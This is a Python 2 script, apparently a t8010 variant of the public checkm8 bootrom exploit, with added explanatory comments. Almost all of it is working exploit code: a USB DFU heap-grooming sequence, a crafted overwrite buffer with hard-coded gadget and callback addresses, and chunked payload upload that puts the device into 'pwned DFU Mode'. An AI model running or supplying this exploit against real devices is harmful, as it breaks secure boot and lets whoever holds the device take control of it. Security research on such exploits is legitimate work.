#!/usr/bin/env python | |
from checkm8 import * | |
def main():
    """Run the t8010 checkm8 DFU sequence against the first DFU device found.

    Reads the device serial number to decide whether to proceed, sends the
    prepared overwrite buffer and the payload returned by ``exploit_config``
    over USB control transfers, then re-reads the serial number looking for
    the ``PWND:[checkm8]`` marker.

    Returns early (without sending anything) when the serial number already
    contains ``PWND:[``. Calls ``sys.exit(1)`` when the marker is missing at
    the end. Prints progress and elapsed time to stdout.

    Every helper used here (``dfu``, ``stall``, ``leak``, ``no_leak``,
    ``exploit_config``, the ``libusb1_*_ctrl_transfer`` functions, ``struct``,
    ``time``, ``sys``) must come from ``from checkm8 import *`` — nothing else
    is imported in this file.

    NOTE: written in Python 2 syntax (``print`` statements, byte-string
    literals); it will not run unchanged under Python 3.
    """
    print '*** checkm8 exploit by axi0mX ***'
    # 1800 is passed positionally; presumably a timeout — TODO confirm in checkm8.dfu.
    device = dfu.acquire_device(1800)
    # Wall-clock start, used for the elapsed-time report at the end.
    start = time.time()
    print 'Found:', device.serial_number
    # The serial string is the only success/idempotency signal used in this script.
    if 'PWND:[' in device.serial_number:
        print 'Device is already in pwned DFU Mode. Not executing exploit.'
        return
    # Second return value of exploit_config is discarded here.
    payload, _ = exploit_config(device.serial_number)
    # Hard-coded t8010-specific constants (no other SoC is handled by this script).
    t8010_nop_gadget = 0x10000CC6C
    callback_chain = 0x1800B0800
    # 0x5c0 zero bytes, then 32 pad bytes and the two values as little-endian u64.
    t8010_overwrite = '\0' * 0x5c0
    t8010_overwrite += struct.pack('<32x2Q', t8010_nop_gadget, callback_chain)
    # heap feng-shui
    stall(device)
    leak(device)
    # Loop index is unused; no_leak is simply called six times.
    for i in range(6):
        no_leak(device)
    dfu.usb_reset(device)
    dfu.release_device(device)
    # set global state and restart usb
    device = dfu.acquire_device()
    # Attribute read whose result is discarded — presumably done for its USB
    # side effect; TODO confirm against checkm8.dfu.
    device.serial_number
    libusb1_async_ctrl_transfer(device, 0x21, 1, 0, 0, 'A' * 0x800, 0.0001)
    libusb1_no_error_ctrl_transfer(device, 0x21, 4, 0, 0, 0, 0)
    dfu.release_device(device)
    # Fixed delay between releasing and re-acquiring the device.
    time.sleep(0.5)
    # heap occupation
    device = dfu.acquire_device()
    # Same discarded attribute read as above.
    device.serial_number
    stall(device)
    leak(device)
    leak(device)
    libusb1_no_error_ctrl_transfer(device, 0, 9, 0, 0, t8010_overwrite, 50)
    # Send the payload in 0x800-byte slices; the final slice may be shorter.
    for i in range(0, len(payload), 0x800):
        libusb1_no_error_ctrl_transfer(device, 0x21, 1, 0, 0,
                                       payload[i:i+0x800], 50)
    dfu.usb_reset(device)
    dfu.release_device(device)
    device = dfu.acquire_device()
    # Success is judged solely by the marker in the re-read serial number.
    if 'PWND:[checkm8]' not in device.serial_number:
        print 'ERROR: Exploit failed. Device did not enter pwned DFU Mode.'
        sys.exit(1)
    print 'Device is now in pwned DFU Mode.'
    print '(%0.2f seconds)' % (time.time() - start)
    dfu.release_device(device)
if __name__ == '__main__':
    # Only run when executed as a script, not when imported as a module.
    main()